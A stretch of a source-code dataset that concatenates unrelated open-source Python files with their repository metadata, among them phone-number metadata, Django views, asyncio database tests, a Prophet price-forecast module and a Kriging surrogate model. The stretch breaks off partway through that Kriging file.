] | permissive | igushev/fase_lib | 8f081e0f6b956b186dc759906b21dc3fc449f045 | 182c626193193b196041b18b9974b5b2cbf15c67 | refs/heads/master | 2023-05-14T14:35:05.727202 | 2022-04-15T23:55:37 | 2022-04-15T23:55:37 | 107,228,694 | 10 | 0 | MIT | 2023-05-01T19:38:09 | 2017-10-17T06:47:07 | Python | UTF-8 | Python | false | false | 710 | py | """Auto-generated file, do not edit by hand. RS metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_RS = PhoneMetadata(id='RS', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='[19]\\d{1,5}', possible_number_pattern='\\d{2,6}', possible_length=(2, 3, 4, 5, 6)),
emergency=PhoneNumberDesc(national_number_pattern='112|9[234]', possible_number_pattern='\\d{2,3}', example_number='112', possible_length=(2, 3)),
short_code=PhoneNumberDesc(national_number_pattern='1[189]\\d{1,4}|9[234]', possible_number_pattern='\\d{2,6}', example_number='112', possible_length=(2, 3, 4, 5, 6)),
short_data=True)
| [
"igushev@gmail.com"
] | igushev@gmail.com |
3e94df54d8c79bf66cff5bd9738907713285a1fb | 4b44a299bafbd4ca408ce1c89c9fe4a449632783 | /python3/06_Collections/02_Tuples/07_named_tuple_ops.py | 7ab2152e8002aeee3c28dc99e29bece4712233ce | [] | no_license | umunusb1/PythonMaterial | ecd33d32b2de664eaaae5192be7c3f6d6bef1d67 | 1e0785c55ccb8f5b9df1978e1773365a29479ce0 | refs/heads/master | 2023-01-23T23:39:35.797800 | 2020-12-02T19:29:00 | 2020-12-02T19:29:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | #!/usr/bin/python
"""
Purpose: Named Tuple ops
"""
from collections import namedtuple
Animal = namedtuple('Animal', 'name age type')
# Assignments
hen = Animal('hen', '2', 'bird')
# 0 1 2
print(hen)
hen = Animal(name='hen', age='2', type='bird')
print(hen)
hen = Animal(age='2', name='hen', type='bird')
print(hen)
# NOTE: Even if the order of values are changes, it can understand
# To get the field names
print(f'{hen._fields =}')
# Accessing values
print()
print('Access By position:', hen[2])
print('Access By key name:', hen.type)
# Converting to dictionary
print(f'{hen._asdict() =}')
| [
"uday3prakash@gmail.com"
] | uday3prakash@gmail.com |
0de9739f74e58c61be4f017af3e9f07f596a8e84 | 1a3228de688754e6c58f248eecfbfdd77c60e72f | /docs/test_asyncio.py | bc288e45631d8804ad67aab78bf222f8558c1f31 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ArtemSerga/hiku | c38d8b4a4fe7ed780680dbe7969652233306a1a3 | 90e7cc50e2754d5dfdc06a6c2f5c6cc55e634566 | refs/heads/master | 2021-01-23T12:46:45.568208 | 2017-06-03T16:40:01 | 2017-06-03T16:40:01 | 93,199,117 | 0 | 0 | null | 2017-06-02T19:52:02 | 2017-06-02T19:52:02 | null | UTF-8 | Python | false | false | 7,346 | py | import uuid
import pytest
import asyncio
# setup storage
from sqlalchemy import MetaData, Table, Column
from sqlalchemy import Integer, String, ForeignKey, select
from sqlalchemy.sql.ddl import CreateTable
metadata = MetaData()
character_table = Table(
'character',
metadata,
Column('id', Integer, primary_key=True),
Column('name', String),
Column('species', String),
)
actor_table = Table(
'actor',
metadata,
Column('id', Integer, primary_key=True),
Column('name', String),
Column('character_id', ForeignKey('character.id'), nullable=False),
)
# setup test environment
import aiopg.sa
async def init_db(pg_dsn, *, loop):
db_name = 'test_{}'.format(uuid.uuid4().hex)
async with aiopg.sa.create_engine(pg_dsn, loop=loop) as db_engine:
async with db_engine.acquire() as conn:
await conn.execute('CREATE DATABASE {0}'.format(db_name))
return db_name
async def setup_db(db_dsn, *, loop):
async with aiopg.sa.create_engine(db_dsn, loop=loop) as db_engine:
async with db_engine.acquire() as conn:
await conn.execute(CreateTable(character_table))
await conn.execute(CreateTable(actor_table))
await conn.execute(character_table.insert().values([
dict(id=1, name='James T. Kirk', species='Human'),
dict(id=2, name='Spock', species='Vulcan/Human'),
dict(id=3, name='Leonard McCoy', species='Human'),
]))
await conn.execute(actor_table.insert().values([
dict(id=1, character_id=1, name='William Shatner'),
dict(id=2, character_id=2, name='Leonard Nimoy'),
dict(id=3, character_id=3, name='DeForest Kelley'),
dict(id=4, character_id=1, name='Chris Pine'),
dict(id=5, character_id=2, name='Zachary Quinto'),
dict(id=6, character_id=3, name='Karl Urban'),
]))
async def drop_db(pg_dsn, db_name, *, loop):
async with aiopg.sa.create_engine(pg_dsn, loop=loop) as db_engine:
async with db_engine.acquire() as conn:
await conn.execute('DROP DATABASE {0}'.format(db_name))
@pytest.fixture(scope='session', name='db_dsn')
def db_dsn_fixture(request):
loop = asyncio.get_event_loop()
pg_dsn = 'postgresql://postgres:postgres@postgres:5432/postgres'
db_name = loop.run_until_complete(init_db(pg_dsn, loop=loop))
db_dsn = 'postgresql://postgres:postgres@postgres:5432/{}'.format(db_name)
loop.run_until_complete(setup_db(db_dsn, loop=loop))
def fin():
loop.run_until_complete(drop_db(pg_dsn, db_name, loop=loop))
request.addfinalizer(fin)
return db_dsn
# define graph
from hiku.graph import Graph, Root, Node, Link
from hiku.types import TypeRef, Sequence
from hiku.engine import pass_context
from hiku.sources import aiopg as sa
SA_ENGINE_KEY = 'sa-engine'
character_query = sa.FieldsQuery(SA_ENGINE_KEY, character_table)
actor_query = sa.FieldsQuery(SA_ENGINE_KEY, actor_table)
character_to_actors_query = sa.LinkQuery(Sequence[TypeRef['actor']], SA_ENGINE_KEY,
from_column=actor_table.c.character_id,
to_column=actor_table.c.id)
async def direct_link(ids):
return ids
@pass_context
async def to_characters_query(ctx):
query = select([character_table.c.id])
async with ctx[SA_ENGINE_KEY].acquire() as conn:
rows = await conn.execute(query)
return [row.id for row in rows]
@pass_context
async def to_actors_query(ctx):
query = select([actor_table.c.id])
async with ctx[SA_ENGINE_KEY].acquire() as conn:
rows = await conn.execute(query)
return [row.id for row in rows]
GRAPH = Graph([
Node('character', [
sa.Field('id', character_query),
sa.Field('name', character_query),
sa.Field('species', character_query),
sa.Link('actors', character_to_actors_query, requires='id'),
]),
Node('actor', [
sa.Field('id', actor_query),
sa.Field('name', actor_query),
sa.Field('character_id', actor_query),
Link('character', TypeRef['character'],
direct_link, requires='character_id'),
]),
Root([
Link('characters', Sequence[TypeRef['character']],
to_characters_query, requires=None),
Link('actors', Sequence[TypeRef['actor']],
to_actors_query, requires=None),
]),
])
# test graph
import aiopg.sa
from hiku.engine import Engine
from hiku.result import denormalize
from hiku.readers.simple import read
from hiku.executors.asyncio import AsyncIOExecutor
async def execute(hiku_engine, sa_engine, graph, query_string):
query = read(query_string)
result = await hiku_engine.execute(graph, query, {SA_ENGINE_KEY: sa_engine})
return denormalize(graph, result, query)
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_character_to_actors(db_dsn, event_loop):
hiku_engine = Engine(AsyncIOExecutor(event_loop))
async with aiopg.sa.create_engine(db_dsn, loop=event_loop) as sa_engine:
result = await execute(hiku_engine, sa_engine, GRAPH,
'[{:characters [:name {:actors [:name]}]}]')
assert result == {
'characters': [
{
'name': 'James T. Kirk',
'actors': [
{'name': 'William Shatner'},
{'name': 'Chris Pine'},
],
},
{
'name': 'Spock',
'actors': [
{'name': 'Leonard Nimoy'},
{'name': 'Zachary Quinto'},
],
},
{
'name': 'Leonard McCoy',
'actors': [
{'name': 'DeForest Kelley'},
{'name': 'Karl Urban'},
],
},
],
}
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_actor_to_character(db_dsn, event_loop):
hiku_engine = Engine(AsyncIOExecutor(event_loop))
async with aiopg.sa.create_engine(db_dsn, loop=event_loop) as sa_engine:
result = await execute(hiku_engine, sa_engine, GRAPH,
'[{:actors [:name {:character [:name]}]}]')
assert result == {
'actors': [
{
'name': 'William Shatner',
'character': {'name': 'James T. Kirk'},
},
{
'name': 'Leonard Nimoy',
'character': {'name': 'Spock'},
},
{
'name': 'DeForest Kelley',
'character': {'name': 'Leonard McCoy'},
},
{
'name': 'Chris Pine',
'character': {'name': 'James T. Kirk'},
},
{
'name': 'Zachary Quinto',
'character': {'name': 'Spock'},
},
{
'name': 'Karl Urban',
'character': {'name': 'Leonard McCoy'},
},
],
}
| [
"vladimir@magamedov.com"
] | vladimir@magamedov.com |
e72c7937c256545ad06b5ab6bfadcaaa59a4f708 | ab4de1c8caf95571be1e29e2c44272080cbf79be | /2018-07-10/diamantes.py | 6d95056c2bf5fb62708f3684e794901c397e63a5 | [] | no_license | grupydf/dojos | f1c3cf7ad941b93efe875500e1bd18c914cfd372 | ea79079a71dfb43b858acebc028de7f61b0e4177 | refs/heads/master | 2021-01-18T16:29:57.786827 | 2020-05-10T19:57:17 | 2020-05-10T19:57:17 | 20,621,041 | 5 | 6 | null | 2020-05-10T19:57:19 | 2014-06-08T16:38:55 | Python | UTF-8 | Python | false | false | 862 | py | """
diamante('c')
a
b b
c c
b b
a
"""
listaTemp = []
abcedario = ['a', 'b', 'c', 'd', ]
alfabeto = 'abcdefghijklmnopqrstuvwxyz'
j = 0
lista2 = []
k = 0
def sequencia(letra):
index = alfabeto.find(letra)
lista = list(alfabeto[:index])
return lista + [letra] + lista[::-1]
"""
for i in alfabeto:
if letra != i:
listaTemp.append(i)
else:
listaTemp.append(i)
break
j=len(listaTemp)
j = j-1
lista2 = listaTemp.copy()
while j > k :
lista2.append(listaTemp[j-1])
j = j - 1
return lista2
"""
def test_sequence_a():
assert sequencia('a') == ['a']
def test_sequence_b():
assert sequencia('b') == ['a', 'b', 'a']
def test_sequence_c():
assert sequencia('c') == ['a', 'b', 'c', 'b', 'a']
| [
"humrochagf@gmail.com"
] | humrochagf@gmail.com |
17111326eafe9c7e22bb9fbee83b1687511d8bd6 | d55937a3fe1490c43f509267081a6ef0122131d1 | /predictions.py | fbf2ca8d7907dffa70c5a48c492187da315e655b | [] | no_license | kennethreitz/coinbin.org | e45abb9a00ae968365f057d7b0f44451d3ef52c7 | bc3232fe5157363240a394a564d96f0500605e38 | refs/heads/master | 2022-05-26T01:02:16.111756 | 2018-01-12T22:20:19 | 2018-01-12T22:20:19 | 101,120,306 | 276 | 40 | null | 2018-01-12T22:20:20 | 2017-08-23T00:43:00 | Python | UTF-8 | Python | false | false | 2,131 | py | import time
import uuid
import records
import os
import maya
import numpy as np
import pandas as pd
# Matplotlib hack.
import matplotlib
matplotlib.use('agg')
import mpld3
from fbprophet import Prophet
from scraper import Coin, MWT, convert_to_decimal
PERIODS = 30
GRAPH_PERIODS = 365
@MWT(timeout=300)
def get_predictions(coin, render=False):
"""Returns a list of predictions, unless render is True.
Otherwise, returns the path of a rendered image.
"""
c = Coin(coin)
q = "SELECT date as ds, value as y from api_coin WHERE name=:coin"
db = records.Database()
rows = db.query(q, coin=c.name)
df = rows.export('df')
df['y_orig'] = df['y'] # to save a copy of the original data..you'll see why shortly.
# log-transform y
df['y'] = np.log(df['y'])
model = Prophet(weekly_seasonality=True, yearly_seasonality=True)
model.fit(df)
periods = PERIODS if not render else GRAPH_PERIODS
future_data = model.make_future_dataframe(periods=periods, freq='d')
forecast_data = model.predict(future_data)
if render:
matplotlib.pyplot.gcf()
fig = model.plot(forecast_data, xlabel='Date', ylabel='log($)')
return mpld3.fig_to_html(fig)
forecast_data_orig = forecast_data # make sure we save the original forecast data
forecast_data_orig['yhat'] = np.exp(forecast_data_orig['yhat'])
forecast_data_orig['yhat_lower'] = np.exp(forecast_data_orig['yhat_lower'])
forecast_data_orig['yhat_upper'] = np.exp(forecast_data_orig['yhat_upper'])
df['y_log'] = df['y'] #copy the log-transformed data to another column
df['y'] = df['y_orig'] #copy the original data to 'y'
# print(forecast_data_orig)
d = forecast_data_orig['yhat'].to_dict()
predictions = []
for i, k in enumerate(list(d.keys())[-PERIODS:]):
w = maya.when(f'{i+1} days from now')
predictions.append({
'when': w.slang_time(),
'timestamp': w.iso8601(),
'usd': convert_to_decimal(d[k]),
})
return predictions
if __name__ == '__main__':
print(get_predictions('btc'))
| [
"me@kennethreitz.org"
] | me@kennethreitz.org |
9d0105951ac244b0c59503e22b216fcdfab8e881 | 90c6262664d013d47e9a3a9194aa7a366d1cabc4 | /tests/storage/cases/test_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA.py | d79748b5bc4a12c3f19b31fdefaf91282de497fa | [
"MIT"
] | permissive | tqtezos/pytezos | 3942fdab7aa7851e9ea81350fa360180229ec082 | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | refs/heads/master | 2021-07-10T12:24:24.069256 | 2020-04-04T12:46:24 | 2020-04-04T12:46:24 | 227,664,211 | 1 | 0 | MIT | 2020-12-30T16:44:56 | 2019-12-12T17:47:53 | Python | UTF-8 | Python | false | false | 1,130 | py | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA.json')
def test_storage_encoding_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| [
"mz@baking-bad.org"
] | mz@baking-bad.org |
d398d48c8080f72fa8318e8bace03ec75d59c088 | acf7457d3a799cb9bff12686d2d616688bcd4b5b | /packages/python/plotly/plotly/validators/splom/marker/colorbar/_ticklabelstep.py | 60e50e822cdfe58fb01e5adc7eecda99cb369c3c | [
"MIT"
] | permissive | plotly/plotly.py | f4f61639f08160f16195efc95b5901dc5a937346 | 975a704074f01c078e0fdfa32bdf17130bf89e69 | refs/heads/master | 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 | MIT | 2023-09-08T19:55:32 | 2013-11-21T05:53:08 | Python | UTF-8 | Python | false | false | 487 | py | import _plotly_utils.basevalidators
class TicklabelstepValidator(_plotly_utils.basevalidators.IntegerValidator):
def __init__(
self, plotly_name="ticklabelstep", parent_name="splom.marker.colorbar", **kwargs
):
super(TicklabelstepValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 1),
**kwargs,
)
| [
"nicolas@plot.ly"
] | nicolas@plot.ly |
d5ab8cba4a8c372c31f9f94079edb50e6fae9033 | 0ccd29f678d3b88832eac8b6b577cb32ee1c0653 | /chaco/chaco_traits.py | 8b1ae8d2cc554ef3eb42d64b3d1c8efe49ef7629 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] | permissive | martinRenou/chaco | 7f0bc36619268f024bc5ea1e62178d5ef77f4b6e | 1888da3ecee89f9b2d11900cda9333b32fc5e89a | refs/heads/master | 2020-07-21T03:40:17.652867 | 2019-09-01T12:12:04 | 2019-09-01T12:12:04 | 206,750,733 | 0 | 0 | NOASSERTION | 2019-09-06T08:36:50 | 2019-09-06T08:36:50 | null | UTF-8 | Python | false | false | 796 | py | """ Defines various traits that are used in many places in Chaco.
"""
# Enthought library imports
from traits.api import Enum
#----------------------------------------------------------------------------
# Box positioning traits: used to specify positions of boxes relative to
# one another. Generally used for layout.
#----------------------------------------------------------------------------
box_edge_enum = Enum("left", "right", "top", "bottom")
# Values correspond to: top, bottom, left, right, top left, top right, bottom
# left, bottom right
box_position_enum = Enum("T", "B", "L", "R", "TL", "TR", "BL", "BR")
# For backwards compatibility, import LineStyle & LineStyleEditor from enable.
# (They used to be defined here.)
from enable.api import LineStyle, LineStyleEditor
# EOF
| [
"ischnell@enthought.com"
] | ischnell@enthought.com |
201ccbd6e28d692a9e14c5f2478ed25401e276b1 | 08e052c0c2ee4ad0cd4980fbc8a692c407118659 | /venv/bin/chardetect | e40b7008dff3ce3f22024dfecbd68230af3a2b76 | [] | no_license | miltonleal/MAC0110_Introduction_Computer_Science_IME_USP | 6fad182f7fbb3e83403080800074bf57456cb0b5 | b47936ce66e715dba79dff44779a750d795192a0 | refs/heads/master | 2023-03-04T11:06:48.092980 | 2021-02-17T14:47:46 | 2021-02-17T14:47:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | #!/Users/admin/PycharmProjects/MAC110/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"milton.leal@usp.br"
] | milton.leal@usp.br | |
6b977a8c07dfe5e184c2f3e20aa3b4c488859dfe | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03838/s376717183.py | 4bdb937150e0dcdff3a481bbfa20fc4825cb3304 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | import sys, re
from collections import deque, defaultdict, Counter
from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import accumulate, permutations, combinations, product
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from bisect import bisect, bisect_left
from fractions import gcd
from heapq import heappush, heappop
from functools import reduce
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def LIST(): return list(map(int, input().split()))
def ZIP(n): return zip(*(MAP() for _ in range(n)))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')
mod = 10 ** 9 + 7
x, y = MAP()
if x*y < 0:
print(1+abs(abs(x)-abs(y)))
elif x == 0 or y == 0:
if x < y:
print(max(abs(x), abs(y)))
else:
print(1+max(abs(x), abs(y)))
else:
if y > x:
print(y-x)
else:
print(2+x-y)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
84cd6d0ec245d8c1be7c030aafca4fa7e34c996e | ea8f71a9a609f15f42bff595bb467722791244a7 | /todo/views.py | 7f489b3f455874f44a52039e8b726be1db9ae581 | [] | no_license | Roderich25/pythonanywhereapp | aafe600cd33c69347655b685f4b792038196aede | 1bd46136e316ea175441ce14a722ddf5b266f767 | refs/heads/master | 2023-05-11T09:37:11.888269 | 2019-10-21T13:24:00 | 2019-10-21T13:24:00 | 216,573,629 | 0 | 0 | null | 2023-04-21T20:39:16 | 2019-10-21T13:21:21 | Python | UTF-8 | Python | false | false | 1,017 | py | from django.shortcuts import render, redirect
from .models import Todo
from .forms import TodoForm, NewTodoForm
from django.views.decorators.http import require_POST
def index(request):
# form = TodoForm()
form = NewTodoForm()
todo_list = Todo.objects.order_by('-id')
context = {"todo_list": todo_list, "form": form}
return render(request, 'todo/index.html', context=context)
@require_POST
def add_todo(request):
# form = TodoForm(request.POST)
form = NewTodoForm(request.POST)
if form.is_valid():
# new_todo = Todo(text=form.cleaned_data['text'])
# new_todo.save()
form.save()
return redirect('index')
def todo_completed(request, todo_id):
todo = Todo.objects.get(pk=todo_id)
todo.completed = True
todo.save()
return redirect('index')
def delete_completed(request):
Todo.objects.filter(completed=True).delete()
return redirect('index')
def delete_all(request):
Todo.objects.all().delete()
return redirect('index')
| [
"rodrigoavilasolis@gmail.com"
] | rodrigoavilasolis@gmail.com |
80bb4b70c97cfbda2f8175dc88f4e6e29922de08 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_PolyTrend_Seasonal_DayOfMonth_LSTM.py | bae3999426ca9e05b0f4c9111fc8851a700d1b80 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 171 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Quantization'] , ['PolyTrend'] , ['Seasonal_DayOfMonth'] , ['LSTM'] ); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
28c9709a759eca89ba9fd8190f371c4e58acd657 | bfa51f4adc2e2a84c98b3bd02e446a1d8a2fd663 | /mtrack/views/facility_locations.py | f3f827bf39313783eb50cfe58c0a4a8320177745 | [] | no_license | unicefuganda/rapidsms-mtrack | a47f7b1a89240fb1c9145bc4dcbb950f1e35df95 | a03cc6cf46a73620e0eb1bc3fe67816d9029f2d6 | refs/heads/master | 2021-05-16T02:25:01.278824 | 2019-07-10T18:42:22 | 2019-07-10T18:42:22 | 2,011,844 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,895 | py | import datetime
from django.template import RequestContext
from django.shortcuts import redirect, get_object_or_404, render_to_response
from rapidsms.contrib.locations.models import Location
from healthmodels.models.HealthFacility import HealthFacility
from rapidsms_httprouter.models import Message
from django.http import HttpResponse
from django.utils import simplejson
from django.conf import settings
def facility_cas(request):
#consider a list
locs = Location.objects.filter(type__name='district').values_list('name',flat=True)
locs = [l.upper() for l in locs]
districts = Location.objects.filter(type__name='district').values('id', 'name').order_by('name')
#facilities = HealthFacility.objects.all().values('id', 'name', 'type__slug').order_by('name')
facilities = [(0, 'Select Facility')]
if request.method == 'POST':
pass
else:
pass
return render_to_response('mtrack/facility_locations.html', {'districts': districts,
'facilities': facilities,
},
context_instance=RequestContext(request))
def ajax_portal2(request):
xtype = request.GET.get('xtype', '')
xid = request.GET.get('xid', '')
if xtype == 'district':
district_locs = Location.objects.get(pk=xid).get_descendants(include_self=True)
facilities = list(HealthFacility.objects.filter(catchment_areas__in=district_locs).\
values('id', 'name', 'type__slug').order_by('name').distinct())
response = facilities
elif xtype == 'facility':
response = list(HealthFacility.objects.get(pk=xid).catchment_areas.all().values('name','type'))
else:
response = []
json = simplejson.dumps(response)
return HttpResponse(json, mimetype='application/json')
| [
"sekiskylink@gmail.com"
] | sekiskylink@gmail.com |
357f0f3acd183afa00d04846c89e4cf6dc948676 | e94c3e02b390b7c37214218083e4c5b2ad622f60 | /算法与数据结构/LeetCode/动态规划(DP)/968.监控二叉树.py | 530702ab36f40a07726d0e3b8f30b2727950cbd3 | [
"MIT"
] | permissive | nomore-ly/Job | 1160e341d9c78c2f99846995893f0289f4e56cf6 | ff4fd24447e30e2d17f15696842e214fba7ad61b | refs/heads/master | 2023-06-21T00:23:47.594204 | 2021-07-23T07:29:47 | 2021-07-23T07:29:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | #
# @lc app=leetcode.cn id=968 lang=python3
#
# [968] 监控二叉树
#
# @lc code=start
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def minCameraCover(self, root: TreeNode) -> int:
def dfs(root: TreeNode) -> List[int]:
if not root:
return [float("inf"), 0, 0]
la, lb, lc = dfs(root.left)
ra, rb, rc = dfs(root.right)
a = lc + rc + 1
b = min(a, la + rb, ra + lb)
c = min(a, lb + rb)
return [a, b, c]
a, b, c = dfs(root)
return b
# @lc code=end
| [
"xiaoqi25478@foxmail.com"
] | xiaoqi25478@foxmail.com |
2c8e6d3328b1b0201a0de2960ec5aa1b14674ed3 | 3db1c06cd10d4a72c3e778006364d5a83d1c5e2c | /subisuhostcheck/djangomonitoring/kitsune/management/commands/kitsune_run_job.py | 4362fb85945fc4d9a3c90dc6185ecf600ab9a68d | [] | no_license | shaktijeet-ego/hostdown | 14f07d309c0346ea0a67d321d774a788d2a1b75e | 9eab7ff08746c0c276bdc46bd1f52d2f02d7d2bb | refs/heads/master | 2023-04-05T19:22:57.064463 | 2021-04-28T03:35:34 | 2021-04-28T03:35:34 | 353,187,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 780 | py | import sys
from django.core.management import call_command
from django.core.management.base import BaseCommand
from kitsune.models import Job, Log
class Command(BaseCommand):
help = 'Runs a specific job. The job will only run if it is not currently running.'
args = "job.id"
def handle(self, *args, **options):
try:
job_id = args[0]
except IndexError:
sys.stderr.write("This command requires a single argument: a job id to run.\n")
return
try:
job = Job.objects.get(pk=job_id)
except Job.DoesNotExist:
sys.stderr.write("The requested Job does not exist.\n")
return
# Run the job and wait for it to finish
job.handle_run()
| [
"shaktijeet.tripathi@gmail.com"
] | shaktijeet.tripathi@gmail.com |
b8a39e4b237775fa112b8b08084ab7469ea8f0e7 | a9e051485379fb7e569a7c8458045e9eb56d4cf8 | /surrogate/estimator/kriging.py | 357dcc5bdc81b8748f80326eee090c87827710c9 | [
"Apache-2.0",
"MIT"
] | permissive | liujiamingustc/phd | 7634056500c481d39fa036bf0ed744c1d13b0035 | 4f815a738abad43531d02ac66f5bd0d9a1def52a | refs/heads/master | 2020-05-17T07:02:56.000146 | 2019-04-24T15:04:19 | 2019-04-24T15:04:19 | 183,567,207 | 4 | 0 | null | 2019-04-26T06:04:37 | 2019-04-26T06:04:37 | null | UTF-8 | Python | false | false | 6,594 | py | # Copyright 2016 Quan Pan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Quan Pan <quanpan302@hotmail.com>
# License: Apache License, Version 2.0
# Create: 2016-12-02
""" Surrogate model based on Kriging. """
from math import log
from surrogate.base import SurrogateModel
# pylint: disable-msg=E0611,F0401
from numpy import zeros, dot, ones, eye, abs, exp, log10, diagonal, \
prod, square, column_stack, ndarray, sqrt, inf, einsum, sum, power
from numpy.linalg import slogdet, linalg
from numpy.dual import lstsq
from scipy.linalg import cho_factor, cho_solve
from scipy.optimize import minimize
class KrigingSurrogate(SurrogateModel):
"""Surrogate Modeling method based on the simple Kriging interpolation.
Predictions are returned as a tuple of mean and RMSE
"""
def __init__(self):
super(KrigingSurrogate, self).__init__()
self.m = 0 # number of independent
self.n = 0 # number of training points
self.thetas = zeros(0)
self.nugget = 0 # nugget smoothing parameter from [Sasena, 2002]
self.R = zeros(0)
self.R_fact = None
self.R_solve_ymu = zeros(0)
self.R_solve_one = zeros(0)
self.mu = zeros(0)
self.log_likelihood = inf
# Training Values
self.X = zeros(0)
self.Y = zeros(0)
def fit(self, x, y):
"""Train the surrogate model with the given set of inputs and outputs.
:param x: Training input locations
:param y: Model responses at given inputs.
"""
super(KrigingSurrogate, self).fit(x, y)
self.m = len(x[0])
self.n = len(x)
if self.n <= 1:
raise ValueError(
'KrigingSurrogate require at least 2 training points.'
)
self.X = x
self.Y = y
def _calcll(thetas):
# Callback function
self.thetas = thetas
self._calculate_log_likelihood()
return -self.log_likelihood
cons = []
for i in xrange(self.m):
cons.append({'type': 'ineq', 'fun': lambda logt: logt[i] - log10(1e-2)}) # min
cons.append({'type': 'ineq', 'fun': lambda logt: log10(3) - logt[i]}) # max
self.thetas = minimize(_calcll, zeros(self.m), method='COBYLA',
constraints=cons, tol=1e-8).x
self._calculate_log_likelihood()
def _calculate_log_likelihood(self):
"""Calculates the log-likelihood (up to a constant) for a given
self.theta.
"""
R = zeros((self.n, self.n))
X, Y = self.X, self.Y
thetas = power(10., self.thetas)
# exponentially weighted distance formula
for i in xrange(self.n):
R[i, i + 1:self.n] = exp(-thetas.dot(square(X[i, ...] - X[i + 1:self.n, ...]).T))
R *= (1.0 - self.nugget)
R += R.T + eye(self.n)
self.R = R
one = ones(self.n)
rhs = column_stack([Y, one])
try:
# Cholesky Decomposition
self.R_fact = cho_factor(R)
sol = cho_solve(self.R_fact, rhs)
solve = lambda x: cho_solve(self.R_fact, x)
det_factor = log(abs(prod(diagonal(self.R_fact[0])) ** 2) + 1.e-16)
except (linalg.LinAlgError, ValueError):
# Since Cholesky failed, try linear least squares
self.R_fact = None # reset this to none, so we know not to use Cholesky
sol = lstsq(self.R, rhs)[0]
solve = lambda x: lstsq(self.R, x)[0]
det_factor = slogdet(self.R)[1]
self.mu = dot(one, sol[:, :-1]) / dot(one, sol[:, -1])
y_minus_mu = Y - self.mu
self.R_solve_ymu = solve(y_minus_mu)
self.R_solve_one = sol[:, -1]
self.sig2 = dot(y_minus_mu.T, self.R_solve_ymu) / self.n
if isinstance(self.sig2, ndarray):
self.log_likelihood = -self.n / 2. * slogdet(self.sig2)[1] \
- 1. / 2. * det_factor
else:
self.log_likelihood = -self.n / 2. * log(self.sig2) \
- 1. / 2. * det_factor
def predict(self, x):
"""Calculates a predicted value of the response based on the current
trained model for the supplied list of inputs.
